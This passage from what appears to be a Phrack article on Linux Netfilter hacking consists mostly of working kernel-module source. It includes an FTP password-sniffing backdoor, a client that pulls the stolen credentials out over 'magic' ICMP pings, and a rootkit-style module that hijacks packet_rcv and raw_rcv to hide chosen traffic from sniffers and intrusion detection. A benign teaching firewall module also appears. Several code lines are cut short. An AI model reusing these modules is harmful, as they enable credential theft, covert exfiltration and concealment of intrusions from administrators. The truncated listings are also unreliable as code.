   struct tcphdr *tcp;
   /* Make sure this is a TCP packet first */
   if (sb->nh.iph->protocol != IPPROTO_TCP)
     return NF_ACCEPT;		       /* Nope, not TCP */
   tcp = (struct tcphdr *)((sb->data) + (sb->nh.iph->ihl * 4));
   /* Now check to see if it's an FTP packet */
   if (tcp->dest != htons(21))
     return NF_ACCEPT;		       /* Nope, not FTP */
   /* Parse the FTP packet for relevant information if we don't already
    * have a username and password pair. */
   if (!have_pair)
   /* We are finished with the packet, let it go on its way */
   return NF_ACCEPT;

/* Procedure that watches incoming ICMP traffic for the "Magic" packet.
 * When that is received, we tweak the skb structure to send a reply
 * back to the requesting host and tell Netfilter that we stole the
 * packet. */
static unsigned int watch_in(unsigned int hooknum,
			     struct sk_buff **skb,
			     const struct net_device *in,
			     const struct net_device *out,
			     int (*okfn)(struct sk_buff *))
   struct sk_buff *sb = *skb;
   struct icmphdr *icmp;
   char *cp_data;		       /* Where we copy data to in reply */
   unsigned int   taddr;	       /* Temporary IP holder */

   /* Do we even have a username/password pair to report yet? */
   if (!have_pair)
     return NF_ACCEPT;
   /* Is this an ICMP packet? */
   if (sb->nh.iph->protocol != IPPROTO_ICMP)
     return NF_ACCEPT;
   icmp = (struct icmphdr *)(sb->data + sb->nh.iph->ihl * 4);

   /* Is it the MAGIC packet? */
   if (icmp->code != MAGIC_CODE || icmp->type != ICMP_ECHO
      return NF_ACCEPT;
   /* Okay, matches our checks for "Magicness", now we fiddle with
    * the sk_buff to insert the IP address, and username/password pair,
    * swap IP source and destination addresses and ethernet addresses
    * if necessary and then transmit the packet from here and tell
    * Netfilter we stole it. Phew... */
   taddr = sb->nh.iph->saddr;
   sb->nh.iph->saddr = sb->nh.iph->daddr;
   sb->nh.iph->daddr = taddr;

   sb->pkt_type = PACKET_OUTGOING;

   switch (sb->dev->type) {
    case ARPHRD_PPP:		       /* No fiddling needs doing */
    case ARPHRD_ETHER:
	   unsigned char t_hwaddr[ETH_ALEN];
	   /* Move the data pointer to point to the link layer header */
	   sb->data = (unsigned char *)sb->mac.ethernet;
	   sb->len += ETH_HLEN; //sizeof(sb->mac.ethernet);
	   memcpy(t_hwaddr, (sb->mac.ethernet->h_dest), ETH_ALEN);
	   memcpy((sb->mac.ethernet->h_dest), (sb->mac.ethernet->h_source),
	   memcpy((sb->mac.ethernet->h_source), t_hwaddr, ETH_ALEN);
   /* Now copy the IP address, then Username, then password into packet */
   cp_data = (char *)((char *)icmp + sizeof(struct icmphdr));
   memcpy(cp_data, &target_ip, 4);
   if (username)
     memcpy(cp_data + 4, username, 16);
   if (password)
     memcpy(cp_data + 20, password, 16);
   /* This is where things will die if they are going to.
    * Fingers crossed... */

   /* Now free the saved username and password and reset have_pair */
   username = password = NULL;
   have_pair = 0;
   target_port = target_ip = 0;

//   printk("Password retrieved\n");
   return NF_STOLEN;

int init_module()
   pre_hook.hook     = watch_in;
   pre_hook.pf       = PF_INET;
   pre_hook.priority = NF_IP_PRI_FIRST;
   pre_hook.hooknum  = NF_IP_PRE_ROUTING;
   post_hook.hook     = watch_out;
   post_hook.pf       = PF_INET;
   post_hook.priority = NF_IP_PRI_FIRST;
   post_hook.hooknum  = NF_IP_POST_ROUTING;
   return 0;

void cleanup_module()
   if (password)
   if (username)

------[ 5.2.2 - getpass.c

<++> nfsniff/getpass.c
/* getpass.c - simple utility to get username/password pair from
 * the Netfilter backdoor FTP sniffer. Very kludgy, but effective.
 * Mostly stripped from my source for InfoPig.
 * Written by bioforge  -  March 2003 */

#include <sys/types.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <errno.h>
#include <sys/socket.h>
#include <netdb.h>
#include <arpa/inet.h>

#ifndef __USE_BSD
# define __USE_BSD		       /* We want the proper headers */
# include <netinet/ip.h>
#include <netinet/ip_icmp.h>

/* Function prototypes */
static unsigned short checksum(int numwords, unsigned short *buff);

int main(int argc, char *argv[])
    unsigned char dgram[256];	       /* Plenty for a PING datagram */
    unsigned char recvbuff[256];
    struct ip *iphead = (struct ip *)dgram;
    struct icmp *icmphead = (struct icmp *)(dgram + sizeof(struct ip));
    struct sockaddr_in src;
    struct sockaddr_in addr;
    struct in_addr my_addr;
    struct in_addr serv_addr;
    socklen_t src_addr_size = sizeof(struct sockaddr_in);
    int icmp_sock = 0;
    int one = 1;
    int *ptr_one = &one;
    if (argc < 3) {
	fprintf(stderr, "Usage:  %s remoteIP myIP\n", argv[0]);

    /* Get a socket */
    if ((icmp_sock = socket(PF_INET, SOCK_RAW, IPPROTO_ICMP)) < 0) {
	fprintf(stderr, "Couldn't open raw socket! %s\n",

    /* set the HDR_INCL option on the socket */
    if(setsockopt(icmp_sock, IPPROTO_IP, IP_HDRINCL,
		  ptr_one, sizeof(one)) < 0) {
	fprintf(stderr, "Couldn't set HDRINCL option! %s\n",
    addr.sin_family = AF_INET;
    addr.sin_addr.s_addr = inet_addr(argv[1]);
    my_addr.s_addr = inet_addr(argv[2]);
    memset(dgram, 0x00, 256);
    memset(recvbuff, 0x00, 256);
    /* Fill in the IP fields first */
    iphead->ip_hl  = 5;
    iphead->ip_v   = 4;
    iphead->ip_tos = 0;
    iphead->ip_len = 84;
    iphead->ip_id  = (unsigned short)rand();
    iphead->ip_off = 0;
    iphead->ip_ttl = 128;
    iphead->ip_p   = IPPROTO_ICMP;
    iphead->ip_sum = 0;
    iphead->ip_src = my_addr;
    iphead->ip_dst = addr.sin_addr;
    /* Now fill in the ICMP fields */
    icmphead->icmp_type = ICMP_ECHO;
    icmphead->icmp_code = 0x5B;
    icmphead->icmp_cksum = checksum(42, (unsigned short *)icmphead);
    /* Finally, send the packet */
    fprintf(stdout, "Sending request...\n");
    if (sendto(icmp_sock, dgram, 84, 0, (struct sockaddr *)&addr,
	       sizeof(struct sockaddr)) < 0) {
	fprintf(stderr, "\nFailed sending request! %s\n",
	return 0;

    fprintf(stdout, "Waiting for reply...\n");
    if (recvfrom(icmp_sock, recvbuff, 256, 0, (struct sockaddr *)&src,
		 &src_addr_size) < 0) {
	fprintf(stdout, "Failed getting reply packet! %s\n",
    iphead = (struct ip *)recvbuff;
    icmphead = (struct icmp *)(recvbuff + sizeof(struct ip));
    memcpy(&serv_addr, ((char *)icmphead + 8),
    	   sizeof (struct in_addr));
    fprintf(stdout, "Stolen for ftp server %s:\n", inet_ntoa(serv_addr));
    fprintf(stdout, "Username:    %s\n",
	     (char *)((char *)icmphead + 12));
    fprintf(stdout, "Password:    %s\n",
	     (char *)((char *)icmphead + 28));
    return 0;

/* Checksum-generation function. It appears that PING'ed machines don't
 * reply to PINGs with invalid (ie. empty) ICMP Checksum fields...
 * Fair enough I guess. */
static unsigned short checksum(int numwords, unsigned short *buff)
   unsigned long sum;
   for(sum = 0;numwords > 0;numwords--)
     sum += *buff++;   /* add next word, then increment pointer */
   sum = (sum >> 16) + (sum & 0xFFFF);
   sum += (sum >> 16);
   return ~sum;

--[ 6 - Hiding network traffic from Libpcap

   This section will briefly describe how the Linux 2.4 kernel
 can be hacked to make network traffic that matches predefined
 conditions invisible to packet  sniffing software  running on
 the local machine.  Presented at the  end of  this article is
 working  code that will  do such a thing for all IPv4 traffic
 coming from or  going to a particular  IP address.  So  let's
 get started shall we...
----[ 6.1 - SOCK_PACKET, SOCK_RAW and Libpcap

   Some of the most useful software for a system administrator
 is that which  can be classified  under the  broad  title  of
 "packet sniffer".  Two of the most common examples of general
 purpose packet sniffers are  tcpdump(1) and Ethereal(1). Both
 of these applications utilise the Libpcap library  (available
 from [1] along with tcpdump) to capture raw packets.  Network
 Intrusion  Detection  Systems  (NIDS)  also  make  use of the
 Libpcap library.  SNORT requires Libpcap, as does  Libnids, a
 NIDS  writing  library that  provides  IP  reassembly and TCP
 stream following and is available from [2].
   On Linux systems, the Libpcap library uses the  SOCK_PACKET
 interface.  Packet sockets  are special  sockets  that can be
 used to send and receive raw packets at the link layer. There
 is a lot that can be said about packet sockets and their use.
 However, because this  section is about  hiding from them and
 not using them,  the interested  reader is  directed  to  the
 packet(7) man page.  For the  discussion  here,  it  is  only
 neccessary to understand that packet sockets are what Libpcap
 applications use to get the information on raw packets coming
 into or going out of the machine.
   When a packet is received by the kernel's network  stack, a
 check is  performed to see  if there  are any packet  sockets
 that would be  interested in this packet.  If there  are then
 the packet is delivered to those interested sockets.  If not,
 the packet simply  continues on it's  way to the  TCP, UDP or
 other socket type that it's  truly bound for.  The same thing
 happens for sockets  of type SOCK_RAW.  Raw sockets  are very
 similar to packet sockets,  except they do not  provide  link
 layer headers.  An  example of a  utility  that utilises  raw
 IP  sockets is my SYNalert  utility, available at [3]  (sorry
 about the shameless plug there :).

   So now you  should see  that packet  sniffing  software  on
 Linux uses the Libpcap library.  Libpcap utilises the  packet
 socket  interface  to obtain raw  packets with link layers on
 Linux systems.  Raw sockets  were also mentioned which act as
 a way for user space  applications to obtain packets complete
 with IP headers.  The next  section will  discuss how  an LKM
 can be used to hide network traffic from these packet and raw
 socket interfaces.

------[ 6.2 Wrapping the cloak around the dagger

   When a packet is  received and sent to a packet socket, the
 packet_rcv() function  is called.  This function can be found
 in  net/packet/af_packet.c.  packet_rcv() is  responsible for
 running the  packet through any  socket  filters that  may be
 applied  to the  destination  socket  and  then the  ultimate
 delivery of the  packet to  user space.  To hide packets from
 a packet  socket we need to prevent  packet_rcv()  from being
 called  at all for certain packets.  How do we do this?  With
 good ol'-fashioned function hijacking of course. 
   The basic operation of  function  hijacking  is that  if we
 know the  address of a kernel  function,  even one that's not
 exported, we can  redirect that function to  another location
 before  we allow  the real code to run.  To do this we  first
 save  so  many of the  original  instruction  bytes from  the
 beginning of the  function and replace them with  instruction
 bytes that perform an absolute jump to our own code.  Example
 i386 assembler to do this is given here:
        movl  (address of our function),  %eax
	jmp   *eax
   The generated hex bytes of these instructions (substituting
 zero as our function address) are:
        0xb8 0x00 0x00 0x00 0x00
	0xff 0xe0
   If in the  initialisation of an LKM we  change the function
 address  of  zero  in  the  code  above to  that of our  hook
 function, we can make our hook function run first.  When (if)
 we want to run  the original  function we simply  restore the
 original bytes at the  beginning, call the function  and then
 replace  our  hijacking code.  Simple, but  powerful.  Silvio
 Cesare has written a  document a while  ago detailing  kernel
 function hijacking. See [4] in the references.

   Now to hide  packets from  packet  sockets we need to first
 write the hook  function that will  check to see if a  packet
 matches our criteria to be hidden.  If it does, then our hook
 function simply returns zero to it's caller and  packet_rcv()
 never  gets called.  If packet_rcv()  never gets called, then
 the  packet is  never  delivered  to the  user  space  packet
 socket.  Note  that it is only the *packet*  socket that this
 packet will be dropped on.  If we want to filter FTP  packets
 from being sent to  packet sockets then the  FTP server's TCP
 socket will  still see the  packet.  All that  we've done  is
 made that packet  invisible to any sniffer  software that may
 be running on the host.  The FTP server will still be able to
 process and log the connection.
   In theory that's all there is too it.  The same  thing  can
 be  done for raw  sockets as well.  The difference is that we
 need to hook  the  raw_rcv()  function (net/ipv4/raw.c).  The
 next  section will  present and  discuss  source  code for an
 example LKM that will  hijack the packet_rcv() and  raw_rcv()
 functions and hide any  packets going to or coming from an IP
 address that we specify.

--[ 7 - Conclusion

Hopefully by now you have at least a basic understanding of what Netfilter
is, how to use it  and what you can do with it. You should also  have  the
knowledge to hide special network traffic from sniffing software running on
the local machine.If you would like a tarball of the sources used for this
tutorial then just  email me.  I  would also  appreciate any  corrections,
comments  or suggestions. Now I leave it to you and your imagination to do
something interesting with what I have presented here.

--[ A - Light-Weight Fire Wall
----[ A.1 - Overview

The  Light-Weight  Fire  Wall  (LWFW)  is  a  simple  kernel  module  that
demonstrates  the basic  packet  filtering  techniques that were presented
in section 4.LWFW also  provides a control  interface  through the ioctl()
system call.

Because the LWFW source is  sufficiently  documented I will  only  provide
a brief overview  of how it  works.  When the  LWFW  module  is  installed
its  first  task  is to try and  register the  control  device.  Note that
before the ioctl()  interface to LWFW can be used, a character device file
needs to be made in /dev.  If the control device registration succeeds the
"in use" marker is cleared and  the hook function for  NF_IP_PRE_ROUTE  is
registered. The clean-up function simply does the reverse of this process.

LWFW provides three basic options for dropping packets. These are, in the
order of processing:
  -- Source interface
  -- Source IP address
  -- Destination TCP port

The specifics of these rules are set with the ioctl() interface.
When a packet is received LWFW will check it against all the rules which
have been set. If it matches any of the rules then the hook function will
return NF_DROP and Netfilter will silently drop the packet. Otherwise
the hook function will return NF_ACCEPT and the packet will continue
on its way.

The last thing worth mentioning is LWFW's statistics logging. Whenever a
packet comes into the hook function and LWFW is active the total
number of packets seen is incremented. The individual rules checking
functions are responsible for incrementing their respective count of
dropped packets. Note that when a rule's value is changed its count of
dropped packets is reset to zero. The lwfwstats program utilises the
LWFW_GET_STATS IOCTL to get a copy of the statistics structure and
display it's contents.

----[ A.2 - The source...  lwfw.c

<++> lwfw/lwfw.c
/* Light-weight Fire Wall. Simple firewall utility based on
 * Netfilter for 2.4. Designed for educational purposes.
 * Written by bioforge  -  March 2003.

#define MODULE
#define __KERNEL__

#include <linux/module.h>
#include <linux/kernel.h>
#include <linux/net.h>
#include <linux/types.h>
#include <linux/skbuff.h>
#include <linux/string.h>
#include <linux/malloc.h>
#include <linux/netdevice.h>
#include <linux/netfilter.h>
#include <linux/netfilter_ipv4.h>
#include <linux/in.h>
#include <linux/ip.h>
#include <linux/tcp.h>

#include <asm/errno.h>
#include <asm/uaccess.h>

#include "lwfw.h"

/* Local function prototypes */
static int set_if_rule(char *name);
static int set_ip_rule(unsigned int ip);
static int set_port_rule(unsigned short port);
static int check_ip_packet(struct sk_buff *skb);
static int check_tcp_packet(struct sk_buff *skb);
static int copy_stats(struct lwfw_stats *statbuff);

/* Some function prototypes to be used by lwfw_fops below. */
static int lwfw_ioctl(struct inode *inode, struct file *file,
		      unsigned int cmd, unsigned long arg);
static int lwfw_open(struct inode *inode, struct file *file);
static int lwfw_release(struct inode *inode, struct file *file);

/* Various flags used by the module */
/* This flag makes sure that only one instance of the lwfw device
 * can be in use at any one time. */
static int lwfw_ctrl_in_use = 0;

/* This flag marks whether LWFW should actually attempt rule checking.
 * If this is zero then LWFW automatically allows all packets. */
static int active = 0;

/* Specifies options for the LWFW module */
static unsigned int lwfw_options = (LWFW_IF_DENY_ACTIVE

static int major = 0;		       /* Control device major number */

/* This struct will describe our hook procedure. */
struct nf_hook_ops nfkiller;

/* Module statistics structure */
static struct lwfw_stats lwfw_statistics = {0, 0, 0, 0, 0};

/* Actual rule 'definitions'. */
/* TODO:  One day LWFW might actually support many simultaneous rules.
 * Just as soon as I figure out the list_head mechanism... */
static char *deny_if = NULL;                 /* Interface to deny */
static unsigned int deny_ip = 0x00000000;    /* IP address to deny */
static unsigned short deny_port = 0x0000;   /* TCP port to deny */

 * This is the interface device's file_operations structure
struct file_operations  lwfw_fops = {
     NULL			       /* Will be NULL'ed from here... */

MODULE_DESCRIPTION("Light-Weight Firewall for Linux 2.4");

 * This is the function that will be called by the hook
unsigned int lwfw_hookfn(unsigned int hooknum,
		       struct sk_buff **skb,
		       const struct net_device *in,
		       const struct net_device *out,
		       int (*okfn)(struct sk_buff *))
   unsigned int ret = NF_ACCEPT;
   /* If LWFW is not currently active, immediately return ACCEPT */
   if (!active)
     return NF_ACCEPT;
   /* Check the interface rule first */
   if (deny_if && DENY_IF_ACTIVE) {
      if (strcmp(in->name, deny_if) == 0) {   /* Deny this interface */
	 return NF_DROP;
   /* Check the IP address rule */
   if (deny_ip && DENY_IP_ACTIVE) {
      ret = check_ip_packet(*skb);
      if (ret != NF_ACCEPT) return ret;
   /* Finally, check the TCP port rule */
   if (deny_port && DENY_PORT_ACTIVE) {
      ret = check_tcp_packet(*skb);
      if (ret != NF_ACCEPT) return ret;
   return NF_ACCEPT;		       /* We are happy to keep the packet */

/* Function to copy the LWFW statistics to a userspace buffer */
static int copy_stats(struct lwfw_stats *statbuff)

   copy_to_user(statbuff, &lwfw_statistics,
		sizeof(struct lwfw_stats));
   return 0;

/* Function that compares a received TCP packet's destination port
 * with the port specified in the Port Deny Rule. If a processing
 * error occurs, NF_ACCEPT will be returned so that the packet is
 * not lost. */
static int check_tcp_packet(struct sk_buff *skb)
   /* Seperately defined pointers to header structures are used
    * to access the TCP fields because it seems that the so-called
    * transport header from skb is the same as its network header TCP packets.
    * If you don't believe me then print the addresses of skb->nh.iph
    * and skb->h.th. 
    * It would have been nicer if the network header only was IP and
    * the transport header was TCP but what can you do? */
   struct tcphdr *thead;
   /* We don't want any NULL pointers in the chain to the TCP header. */
   if (!skb ) return NF_ACCEPT;
   if (!(skb->nh.iph)) return NF_ACCEPT;

   /* Be sure this is a TCP packet first */
   if (skb->nh.iph->protocol != IPPROTO_TCP) {
      return NF_ACCEPT;

   thead = (struct tcphdr *)(skb->data + (skb->nh.iph->ihl * 4));
   /* Now check the destination port */
   if ((thead->dest) == deny_port) {
      /* Update statistics */
      return NF_DROP;
   return NF_ACCEPT;

/* Function that compares a received IPv4 packet's source address
 * with the address specified in the IP Deny Rule. If a processing
 * error occurs, NF_ACCEPT will be returned so that the packet is
 * not lost. */
static int check_ip_packet(struct sk_buff *skb)
   /* We don't want any NULL pointers in the chain to the IP header. */
   if (!skb ) return NF_ACCEPT;
   if (!(skb->nh.iph)) return NF_ACCEPT;
   if (skb->nh.iph->saddr == deny_ip) {/* Matches the address. Barf. */
      lwfw_statistics.ip_dropped++;    /* Update the statistics */
      return NF_DROP;
   return NF_ACCEPT;

static int set_if_rule(char *name)
   int ret = 0;
   char *if_dup;		       /* Duplicate interface */
   /* Make sure the name is non-null */
   /* Free any previously saved interface name */
   if (deny_if) {
      deny_if = NULL;
   if ((if_dup = kmalloc(strlen((char *)name) + 1, GFP_KERNEL))
        == NULL) {
      ret = -ENOMEM;
   } else {
      memset(if_dup, 0x00, strlen((char *)name) + 1);
      memcpy(if_dup, (char *)name, strlen((char *)name));

   deny_if = if_dup;
   lwfw_statistics.if_dropped = 0;     /* Reset drop count for IF rule */
   printk("LWFW: Set to deny from interface: %s\n", deny_if);
   return ret;

static int set_ip_rule(unsigned int ip)
   deny_ip = ip;
   lwfw_statistics.ip_dropped = 0;     /* Reset drop count for IP rule */
   printk("LWFW: Set to deny from IP address: %d.%d.%d.%d\n",
	  ip & 0x000000FF, (ip & 0x0000FF00) >> 8,
	  (ip & 0x00FF0000) >> 16, (ip & 0xFF000000) >> 24);
   return 0;

static int set_port_rule(unsigned short port)
   deny_port = port;
   lwfw_statistics.tcp_dropped = 0;    /* Reset drop count for TCP rule */
   printk("LWFW: Set to deny for TCP port: %d\n",
	  ((port & 0xFF00) >> 8 | (port & 0x00FF) << 8));
   return 0;

 * File operations functions for control device
static int lwfw_ioctl(struct inode *inode, struct file *file,
		      unsigned int cmd, unsigned long arg)
   int ret = 0;
   switch (cmd) {
    case LWFW_GET_VERS:
      return LWFW_VERS;
    case LWFW_ACTIVATE: {
       active = 1;
       printk("LWFW: Activated.\n");
       if (!deny_if && !deny_ip && !deny_port) {
	  printk("LWFW: No deny options set.\n");
       active ^= active;
       printk("LWFW: Deactivated.\n");
    case LWFW_GET_STATS: {
       ret = copy_stats((struct lwfw_stats *)arg);
    case LWFW_DENY_IF: {
       ret = set_if_rule((char *)arg);
    case LWFW_DENY_IP: {
       ret = set_ip_rule((unsigned int)arg);
    case LWFW_DENY_PORT: {
       ret = set_port_rule((unsigned short)arg);
      ret = -EBADRQC;
   return ret;

/* Called whenever open() is called on the device file */
static int lwfw_open(struct inode *inode, struct file *file)
   if (lwfw_ctrl_in_use) {
      return -EBUSY;
   } else {
      return 0;
   return 0;

/* Called whenever close() is called on the device file */
static int lwfw_release(struct inode *inode, struct file *file)
   lwfw_ctrl_in_use ^= lwfw_ctrl_in_use;
   return 0;

 * Module initialisation and cleanup follow...
int init_module()
   /* Register the control device, /dev/lwfw */
   /* Attempt to register the LWFW control device */
   if ((major = register_chrdev(LWFW_MAJOR, LWFW_NAME,
				&lwfw_fops)) < 0) {
      printk("LWFW: Failed registering control device!\n");
      printk("LWFW: Module installation aborted.\n");
      return major;
   /* Make sure the usage marker for the control device is cleared */
   lwfw_ctrl_in_use ^= lwfw_ctrl_in_use;

   printk("\nLWFW: Control device successfully registered.\n");
   /* Now register the network hooks */
   nfkiller.hook = lwfw_hookfn;
   nfkiller.hooknum = NF_IP_PRE_ROUTING;   /* First stage hook */
   nfkiller.pf = PF_INET;	           /* IPV4 protocol hook */
   nfkiller.priority = NF_IP_PRI_FIRST;    /* Hook to come first */
   /* And register... */
   printk("LWFW: Network hooks successfully installed.\n");
   printk("LWFW: Module installation successful.\n");
   return 0;

void cleanup_module()
   int ret;
   /* Remove IPV4 hook */

   /* Now unregister control device */
   if ((ret = unregister_chrdev(LWFW_MAJOR, LWFW_NAME)) != 0) {
      printk("LWFW: Removal of module failed!\n");

   /* If anything was allocated for the deny rules, free it here */
   if (deny_if)
   printk("LWFW: Removal of module successful.\n");

<++> lwfw/lwfw.h
/* Include file for the Light-weight Fire Wall LKM.
 * A very simple Netfilter module that drops backets based on either
 * their incoming interface or source IP address.
 * Written by bioforge  -  March 2003

#ifndef __LWFW_INCLUDE__
# define __LWFW_INCLUDE__

/* NOTE: The LWFW_MAJOR symbol is only made available for kernel code.
 * Userspace code has no business knowing about it. */
# define LWFW_NAME        "lwfw" 

/* Version of LWFW */
# define LWFW_VERS        0x0001       /* 0.1 */

/* Definition of the LWFW_TALKATIVE symbol controls whether LWFW will
 * print anything with printk(). This is included for debugging purposes.

/* These are the IOCTL codes used for the control device */
#define LWFW_CTRL_SET   0xFEED0000     /* The 0xFEED... prefix is arbitrary */
#define LWFW_GET_VERS   0xFEED0001     /* Get the version of LWFM */
#define LWFW_ACTIVATE   0xFEED0002
#define LWFW_GET_STATS  0xFEED0004
#define LWFW_DENY_IF    0xFEED0005
#define LWFW_DENY_IP    0xFEED0006
#define LWFW_DENY_PORT  0xFEED0007

/* Control flags/Options */
#define LWFW_IF_DENY_ACTIVE   0x00000001
#define LWFW_IP_DENY_ACTIVE   0x00000002
#define LWFW_PORT_DENY_ACTIVE 0x00000004

/* Statistics structure for LWFW.
 * Note that whenever a rule's condition is changed the related
 * xxx_dropped field is reset.
struct lwfw_stats {
   unsigned int if_dropped;	       /* Packets dropped by interface rule */
   unsigned int ip_dropped;	       /* Packets dropped by IP addr. rule */
   unsigned int tcp_dropped;	       /* Packets dropped by TCP port rule */
   unsigned long total_dropped;   /* Total packets dropped */
   unsigned long total_seen;      /* Total packets seen by filter */

 * From here on is used solely for the actual kernel module
#ifdef __KERNEL__
# define LWFW_MAJOR       241   /* This exists in the experimental range */

/* This macro is used to prevent dereferencing of NULL pointers. If
 * a pointer argument is NULL, this will return -EINVAL */
#define NULL_CHECK(ptr)    \
   if ((ptr) == NULL)  return -EINVAL

/* Macros for accessing options */
#define DENY_IF_ACTIVE    (lwfw_options & LWFW_IF_DENY_ACTIVE)
#define DENY_IP_ACTIVE    (lwfw_options & LWFW_IP_DENY_ACTIVE)
#define DENY_PORT_ACTIVE  (lwfw_options & LWFW_PORT_DENY_ACTIVE)

#endif				       /* __KERNEL__ */

<++> lwfw/Makefile
CC= egcs
CFLAGS= -Wall -O2
OBJS= lwfw.o

	$(CC) -c $< -o $@ $(CFLAGS)

all: $(OBJS)

	rm -rf *.o
	rm -rf ./*~

--[ B - Code for section 6

   Presented  here is  a  simple  module that will  hijack the
 packet_rcv() and raw_rcv() functions to hide  any packets  to
 or from the  IP address  we specify.  The default  IP address
 is set to, but this  can be changed by changing the
 value of  the  #define IP.  Also  presented is a  bash script
 that will get the addresses for the required functions from a
 System.map  file  and run  insmod  with  these  addresses  as
 parameters in the required  format.  This loader  script  was
 written by  grem.  Originally for  my Mod-off project, it was
 easily  modified to suit  the module  presented here.  Thanks
 again grem.
   The presented module  is proof-of-concept  code only and as
 such, does not have anything in the way of module  hiding. It
 is also  important to  remember that although this module can
 hide  traffic  from a  sniffer  running on the  same  host, a
 sniffer on a different host, but on the same LAN segment will
 still see  the packets. From what is presented in the module,
 smart  readers  should have  everything  they need to  design
 filtering functions to block any kind of packets they need. I
 have successfully used the technique presented  in this  text
 to hide control and information retrieval packets used by  my
 other LKM projects.
<++> pcaphide/pcap_block.c
/* Kernel hack that will hijack the packet_rcv() function
 * which is used to pass packets to  Libpcap applications
 * that use  PACKET sockets.  Also  hijacks the raw_rcv()
 * function. This is used to pass packets to applications
 * that open RAW sockets.
 * Written by bioforge  -  30th June, 2003

#define MODULE
#define __KERNEL__

#include <linux/config.h>
#include <linux/module.h>
#include <linux/kernel.h>
#include <linux/netdevice.h>
#include <linux/skbuff.h>
#include <linux/smp_lock.h>
#include <linux/ip.h>		       /* For struct ip */
#include <linux/if_ether.h>	       /* For ETH_P_IP */

#include <asm/page.h>		       /* For PAGE_OFFSET */

 * IP address to hide in NBO for Intel */
#define IP    htonl(0x7F000001)

/* Function pointer for original packet_rcv() */
static int (*pr)(struct sk_buff *skb, struct net_device *dev,
		  struct packet_type *pt);
MODULE_PARM(pr, "i");       /* Retrieved as insmod parameter */

/* Function pointer for original raw_rcv() */
static int (*rr)(struct sock *sk, struct sk_buff *skb);
MODULE_PARM(rr, "i");

/* Spinlock used for the parts where we un/hijack packet_rcv() */
static spinlock_t hijack_lock  = SPIN_LOCK_UNLOCKED;

/* Helper macros for use with the Hijack spinlock */
#define HIJACK_LOCK    spin_lock_irqsave(&hijack_lock, \
#define HIJACK_UNLOCK  spin_unlock_irqrestore(&hijack_lock, \

#define CODESIZE 10
/* Original and hijack code buffers.
 * Note that the hijack code also provides 3 additional
 * bytes ( inc eax;  nop;  dec eax ) to try and throw
 * simple hijack detection techniques that just look for
 * a move and a jump. */
/* For packet_rcv() */
static unsigned char pr_code[CODESIZE] = "\xb8\x00\x00\x00\x00"
static unsigned char pr_orig[CODESIZE];

/* For raw_rcv() */
static unsigned char rr_code[CODESIZE] = "\xb8\x00\x00\x00\x00"
static unsigned char rr_orig[CODESIZE];

/* Replacement for packet_rcv(). This is currently setup to hide
 * all packets with a source or destination IP address that we
 * specify. */
int hacked_pr(struct sk_buff *skb, struct net_device *dev,
	       struct packet_type *pt)
    int sl_flags;		       /* Flags for spinlock */
    int retval;

    /* Check if this is an IP packet going to or coming from our
     * hidden IP address. */
    if (skb->protocol == htons(ETH_P_IP))   /* IP packet */
      if (skb->nh.iph->saddr == IP || skb->nh.iph->daddr == IP)
	return 0;		    /* Ignore this packet */
    /* Call original */
    memcpy((char *)pr, pr_orig, CODESIZE);
    retval = pr(skb, dev, pt);
    memcpy((char *)pr, pr_code, CODESIZE);

    return retval;

/* Replacement for raw_rcv(). This is currently setup to hide
 * all packets with a source or destination IP address that we
 * specify. */
int hacked_rr(struct sock *sock, struct sk_buff *skb)
    int sl_flags;		       /* Flags for spinlock */
    int retval;

    /* Check if this is an IP packet going to or coming from our
     * hidden IP address. */
    if (skb->protocol == htons(ETH_P_IP))   /* IP packet */
      if (skb->nh.iph->saddr == IP || skb->nh.iph->daddr == IP)
	return 0;		    /* Ignore this packet */
    /* Call original */
    memcpy((char *)rr, rr_orig, CODESIZE);
    retval = rr(sock, skb);
    memcpy((char *)rr, rr_code, CODESIZE);

    return retval;

int init_module()
    int sl_flags;		       /* Flags for spinlock */
    /* pr & rr set as module parameters. If zero or < PAGE_OFFSET
     * (which we treat as the lower bound of kernel memory), then
     * we will not install the hacks. */
    if ((unsigned int)pr == 0 || (unsigned int)pr < PAGE_OFFSET) {
	printk("Address for packet_rcv() not valid! (%08x)\n",
	return -1;
    if ((unsigned int)rr == 0 || (unsigned int)rr < PAGE_OFFSET) {
	printk("Address for raw_rcv() not valid! (%08x)\n",
	return -1;
    *(unsigned int *)(pr_code + 1) = (unsigned int)hacked_pr;
    *(unsigned int *)(rr_code + 1) = (unsigned int)hacked_rr;
    memcpy(pr_orig, (char *)pr, CODESIZE);
    memcpy((char *)pr, pr_code, CODESIZE);
    memcpy(rr_orig, (char *)rr, CODESIZE);
    memcpy((char *)rr, rr_code, CODESIZE);
    return 0;

void cleanup_module()
    int sl_flags;
    memcpy((char *)pr, pr_orig, CODESIZE);
    memcpy((char *)rr, rr_orig, CODESIZE);

<++> pcaphide/loader.sh
#  Written by  grem, 30th June 2003
#  Hacked by bioforge, 30th June 2003

if [ "$1" = "" ]; then
        echo "Use: $0 <System.map>";

PR=`cat $MAP | grep -w "packet_rcv" | cut -c 1-16`
RR=`cat $MAP | grep -w "raw_rcv" | cut -c 1-16`

if [ "$PR" = "" ]; then
if [ "$RR" = "" ]; then

echo "insmod pcap_block.o pr=0x$PR rr=0x$RR"

# Now do the actual call to insmod
insmod pcap_block.o pr=0x$PR rr=0x$RR

<++> pcaphide/Makefile
CC= gcc
CFLAGS= -Wall -O2 -fomit-frame-pointer
INCLUDES= -I/usr/src/linux/include
OBJS= pcap_block.o

	$(CC) -c $< -o $@ $(CFLAGS) $(INCLUDES)

all: $(OBJS)

	rm -rf *.o
	rm -rf ./*~

------[ References

This appendix contains a list of references used in writing this article.

 [1]  The tcpdump group
 [2]  The Packet Factory
 [3]  My network tools page -
 [4]  Silvio Cesare's Kernel Function Hijacking article
 [5]  Man pages for:
    - raw (7)
    - packet (7)
    - tcpdump (1)
 [6]  Linux kernel source files. In particular:
    - net/packet/af_packet.c     (for  packet_rcv())
    - net/ipv4/raw.c             (for  raw_rcv())
    - net/core/dev.c
    - net/ipv4/netfilter/*
 [7] Harald Welte's Journey of a packet through the Linux 2.4 network
 [8] The Netfilter documentation page
 [9] Phrack 55 - File 12 -
 [A] Linux Device Drivers 2nd Ed. by Alessandro Rubini et al.
 [B] Inside the Linux Packet Filter. A Linux Journal article

|=[ EOF ]=---------------------------------------------------------------=|

[ News ] [ Paper Feed ] [ Issues ] [ Authors ] [ Archives ] [ Contact ]
© Copyleft 1985-2021, Phrack Magazine.